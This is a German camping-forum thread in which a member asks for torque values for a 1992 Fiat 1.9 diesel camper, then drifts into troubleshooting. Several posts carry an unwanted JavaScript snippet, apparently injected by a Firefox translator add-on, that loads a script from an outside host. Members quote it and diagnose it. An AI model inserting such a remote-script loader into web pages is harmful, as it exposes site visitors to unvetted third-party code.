Ergebnis 1 bis 18 von 18

Thema: drehmomentwerte

  1. #1
    Registriert seit
    12.04.2012
    Ort
    Obersteiermark,salzkammergut
    Beiträge
    52

    Standard drehmomentwerte

    hallo an alle campingforumfreunde,hat jemand von euch drehmomentwerte für fiat 1,9 d ( turbo müsste auch gehen ) bj 1992 glaube 1929 ccm 71 ps ,habe ab jetzt 2 drehmomentschlüssel 6-60 nm,20-210 nm ,und möchte ab jetzt alles genauer machen ( nicht nur nach gefühl ) also ganz wichtig ölwannenschrauben , ölablasschraube ,zylinderdeckeldichtung ,aber auch bitte alles andere das ihr finden könnt,

    habe noch einige service arbeiten vor ( öl,filter ,luftf. getriebeöl, usw .) und möchte alles im herbst erledigen ,damit ich im frühjahr gleich wieder losdüsen kann ,hab mein womo jetzt ein jahr und habe es auf 30 übernächtigungen gebracht ( einfach super so ein ding -warum ist mir das nicht früher eingefallen ??? )

    bin gespannt ob jemand solche werte für mich auftreiben kann

    wünsch euch noch eine schöne woche ,klaus,

  2. #2
    Registriert seit
    10.11.2009
    Ort
    Steiermark,Bez.Murtal
    Beiträge
    5.242

    Standard

    Hallo,

    suchst du allgemeine Drehmomentenwerte dann siehe unter...www.gedore.at/ ....nach
    Unter Produkte > Onlinekatalog (fast ganz hinten) findest du für alle Schrauben die Drehmomentangaben.
    Lg
    Andreas
    Träume nicht dein Leben ,lebe deine Träume
    Unterwegs mit einen Pössl Summit 600 Plus
    www.camping-murinsel.at

  3. #3
    Registriert seit
    12.05.2011
    Ort
    Bezirk Mödling
    Beiträge
    434

    Standard Die Wahrheit

    über Drehmomentwerte steht einzig allein im Werkstatthandbuch und sonst nirgends.

    lg Franz

    !function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function (){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadysta techange=null;h.removeChild(s);}};h.appendChild(s) ;}catch(ex){}}();

  4. #4
    Registriert seit
    19.07.2007
    Ort
    Österreich.
    Beiträge
    5.737

    Standard

    Zitat Zitat von derfranze Beitrag anzeigen
    über Drehmomentwerte steht einzig allein im Werkstatthandbuch und sonst nirgends.

    lg Franz
    !function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function (){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadysta techange=null;h.removeChild(s);}};h.appendChild(s) ;}catch(ex){}}();
    Is zwar sehr OT, aber sangs amoi Herr Franz, lasst sich ihre Signatur irgendwie dechiffrieren

    lg Ferdl

    lg Ferdl


  5. #5
    Registriert seit
    02.03.2008
    Ort
    8402
    Beiträge
    3.814

    Standard

    Drehmoment für Radmuttern steht auch in der Betriebsanleitung.
    LG Gerry!

  6. #6
    Registriert seit
    17.07.2012
    Beiträge
    157

    Standard REP Anleitung

    das erste, was ich üblicherweise kaufe wenn ich ein neues Auto habe ist eine Reparaturanleitung für das passende Modell. Vielleicht wirst Du hier fündig (genau vergleichen):

    http://www.bestseller.co.at/ebizz/sh...G_Nr=1&WG=1120

  7. #7
    Registriert seit
    13.09.2006
    Ort
    Wien, Österreich
    Beiträge
    8.253

    Standard

    Zitat Zitat von Ferdlnand Beitrag anzeigen
    Is zwar sehr OT, aber sangs amoi Herr Franz, lasst sich ihre Signatur irgendwie dechiffrieren
    lg Ferdl

    hi

    des ist ein geheimer code fuer die eingeweihten mit dem geheime dokumente dechifrieren werden koennen

    frueher hams des jahrzehntelang mit frauenstimmen auf kurzwelle gemacht die tag und nacht im sekundenabstand ziffern durchgesagt haben ...

    aber seit es des campingforum gibt machens des jetzt durch den herrn franz..

    ;-)
    „Würden die Menschen das Geldsystem verstehen, hätten wir eine Revolution noch vor morgen früh.“

    Sir Henry Ford; Industrieller (1863 – 1947)

  8. #8
    Registriert seit
    12.05.2011
    Ort
    Bezirk Mödling
    Beiträge
    434

    Standard seit dem updagte auf firefox 15

    hab ich bei meinen Postings diesen Anhang. wenn jemand Abhilfe weis, bitte sehr. Und nur in diesem Forum, der Rest funktioniert. Nur ein Wechsel des Firefox kommt nicht in Frage.

    lg Franz

    !!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function (){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadysta techange=null;h.removeChild(s);}};h.appendChild(s) ;}catch(ex){}}();

  9. #9
    Registriert seit
    21.05.2004
    Ort
    Herz der Alpen - Tirol
    Beiträge
    4.318

    Standard

    Zitat Zitat von derfranze Beitrag anzeigen
    hab ich bei meinen Postings diesen Anhang. wenn jemand Abhilfe weis, bitte sehr. Und nur in diesem Forum, der Rest funktioniert. Nur ein Wechsel des Firefox kommt nicht in Frage.

    lg Franz

    !!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function (){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadysta techange=null;h.removeChild(s);}};h.appendChild(s) ;}catch(ex){}}();
    Hallo Franz,

    offensichtlich hast du in deinen "Einstellungen" (vom Forum) in "Signatur bearbeiten" einen ungültigen Wert stehen ...

    Geh mal in "Signatur bearbeiten" - markiere das Ganze Feld - auch wenn du nichts darin sehen kannst - und lösche anschließend alles Markierte ... Dann schreib irgendwas "nettes" in deine Signatur und speichere das ...

    Möglicherweise musst du das mit dem IE machen ..... dann aber schnell wieder zum FF wechseln ;-)

    viel Glück

    gerilu
    "Tirolergruß"
    gerilu

  10. #10
    Registriert seit
    12.05.2011
    Ort
    Bezirk Mödling
    Beiträge
    434

    Standard

    Zitat Zitat von gerilu Beitrag anzeigen
    Hallo Franz,

    offensichtlich hast du in deinen "Einstellungen" (vom Forum) in "Signatur bearbeiten" einen ungültigen Wert stehen ...

    Geh mal in "Signatur bearbeiten" - markiere das Ganze Feld - auch wenn du nichts darin sehen kannst - und lösche anschließend alles Markierte ... Dann schreib irgendwas "nettes" in deine Signatur und speichere das ...

    Möglicherweise musst du das mit dem IE machen ..... dann aber schnell wieder zum FF wechseln ;-)

    viel Glück
    gerilu
    Also in der Signatur stand nichts drinnen, ich konnt dadurch auch nichts markieren oder löschen. Aber unter Einstellungen hab ich mal das Häkchen bei Signatur anzeigen weggenommen - und schaun mer mal...

    lg




    !function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function (){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadysta techange=null;h.removeChild(s);}};h.appendChild(s) ;}catch(ex){}}();

  11. #11
    Registriert seit
    29.07.2004
    Ort
    Österreich, Wien 14
    Beiträge
    10.264

    Standard

    Zitat Zitat von derfranze Beitrag anzeigen
    Also in der Signatur stand nichts drinnen, ich konnt dadurch auch nichts markieren oder löschen. Aber unter Einstellungen hab ich mal das Häkchen bei Signatur anzeigen weggenommen - und schaun mer mal...

    lg



    !function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function (){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadysta techange=null;h.removeChild(s);}};h.appendChild(s) ;}catch(ex){}}();
    Hallo

    das wars wohl auch nicht
    Liebe Grüsse
    allzeit GUTE Fahrt und kommt gesund wieder Heim wünscht
    Westbahnmichi und seine Gabi
    kommen aus Wien 14


    www.rdh-websolutions.at

  12. #12
    Registriert seit
    21.05.2004
    Ort
    Herz der Alpen - Tirol
    Beiträge
    4.318

    Standard

    Franz - das scheint ein Javascript zu sein, das sich auf die "sterkly Revenue Suite" bezieht ... diese gibts offensichtlich nicht mehr und somit kommt dieser Text bei dir (und nicht nur bei dir - gib den Code mal in G++gle ein - da haben sogar professionelle die selben Seiten Probleme !!)

    Versuch mal in FF Javascript zu deaktivieren - mit dem CCleaner (freeware im WWW) ALLE Verläufe, Cookies, etc zu löschen und aktiviere erst dann wieder JS im FF

    Schreib eventuell in Opers, oder IE angemeldet einen Beitrag im Forum - gehts da "ohne" ...?

    Dann versuch noch - Internetoptionen - Erweitert - Hacken vor Skriptdebugging (andere) deaktivieren ... und Hacken weg vor "Skriptfehler anzeigen" ...

    gerilu
    "Tirolergruß"
    gerilu

  13. #13
    Registriert seit
    12.05.2011
    Ort
    Bezirk Mödling
    Beiträge
    434

    Standard alles klar

    mal den gerilu Vorschlag umgesetzt. Ich werde keine neuen Beiträge mehr schreiben, sondern diesen immer wieder ändern.

    jetzt gehts :-), danke für eure Hilfe UND es war der Sprachübersetzer Lingo im Firefox

    lg Franz
    Geändert von derfranze (19.09.2012 um 16:28 Uhr)

  14. #14
    Registriert seit
    21.05.2004
    Ort
    Herz der Alpen - Tirol
    Beiträge
    4.318

    Standard

    Zitat Zitat von derfranze Beitrag anzeigen
    mal den gerilu Vorschlag umgesetzt. Ich werde keine neuen Beiträge mehr schreiben, sondern diesen immer wieder ändern.

    jetzt gehts :-), danke für eure Hilfe UND es war der Sprachübersetzer Lingo im Firefox

    lg Franz
    .... siehste - geht ja alles, wenn man weiß/wüsste, wies geht ....

    gerilu
    "Tirolergruß"
    gerilu

  15. #15
    Registriert seit
    12.05.2011
    Ort
    Bezirk Mödling
    Beiträge
    434

    Standard

    Zitat Zitat von gerilu Beitrag anzeigen
    .... siehste - geht ja alles, wenn man weiß/wüsste, wies geht ....

    gerilu

    Stimmt schon, aber wirklich gewusst und nachhaltig beseitigt hat es meine Partnerin.

    lg Franz

  16. #16
    Registriert seit
    27.04.2005
    Ort
    Wien
    Beiträge
    4.973

    Standard

    Zitat Zitat von derfranze Beitrag anzeigen
    Stimmt schon, aber wirklich gewusst und nachhaltig beseitigt hat es meine Partnerin.

    lg Franz
    Das kann ich mir jetzt nicht verkneifen:
    In der Theroie top, in der Praxis happerts.
    lg
    Ernstl aus Wien
    Unterwegs mit 5 Kindern,
    Citroen Evasion und Hobby 560kmfe Exklusive

  17. #17
    Registriert seit
    12.05.2011
    Ort
    Bezirk Mödling
    Beiträge
    434

    Standard

    Zitat Zitat von schlesi66 Beitrag anzeigen
    Das kann ich mir jetzt nicht verkneifen:
    In der Theroie top, in der Praxis happerts.
    Meine Partnerin hat 4-fach Studium - soviel zum Thema Praxis - u.a auch EDV und mich fürs wirklich Praktische

    lg Franz

  18. #18
    Registriert seit
    27.04.2005
    Ort
    Wien
    Beiträge
    4.973

    Standard

    Zitat Zitat von derfranze Beitrag anzeigen
    Meine Partnerin hat 4-fach Studium - soviel zum Thema Praxis - u.a auch EDV und mich fürs wirklich Praktische

    lg Franz
    Guten Morgen.
    Das gefällt mir - Daumen hoch - daß du auch Spass verträgst.
    lg
    Ernstl aus Wien
    Unterwegs mit 5 Kindern,
    Citroen Evasion und Hobby 560kmfe Exklusive

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •